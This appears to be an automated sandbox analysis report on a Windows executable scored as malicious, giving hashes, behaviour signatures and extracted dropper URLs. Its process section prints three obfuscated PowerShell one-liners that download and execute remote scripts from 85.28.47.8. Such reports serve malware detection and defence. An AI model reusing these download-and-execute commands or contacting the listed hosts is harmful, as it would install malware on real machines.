Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    04/07/2024, 09:15

General

  • Target

    file.exe

  • Size

    36KB

  • MD5

    92d4e2ef88e5aafb72ddde13e84b549a

  • SHA1

    24ddd5e2c7e96e52e00f5a6e2b29e4b100d0c578

  • SHA256

    a77d96f186d1cc96dc589f4a6d55b45c9c04c77072fd504a720f437412ff93cb

  • SHA512

    af4822dafe72de541134b80d00b5fa2b1539a0c82b1261854fb15f24ec7cdf3e34791e19915dab32b132c6e6e58760f4c599d532fcb220f89e941cb065e28c6f

  • SSDEEP

    384:4b9oKDQckRKDVbJapdKDGPGAtyfc1FKDGPGAIpEKDVbJrkiKDQ:M90PGeD1ZPGv9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/L.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/M.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/S.png

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/L.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/M.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/S.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2336

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          a95be2e8791464fbff50e740ade31c62

          SHA1

          4b722637610f4cd1beea5e46bfb70053f5917043

          SHA256

          684dd83494ac8cf3597cbb2a795fa711e91b1f4ce31426359914dccda04acd6a

          SHA512

          8637455c7ebf1cb5505d1c19ec2a9c67cd320cfc77c41e55957d5ff045a1b35aebb485d5c3c137f1d8b61d9e6bacea8543eb438351e6b597e726bc701f44b589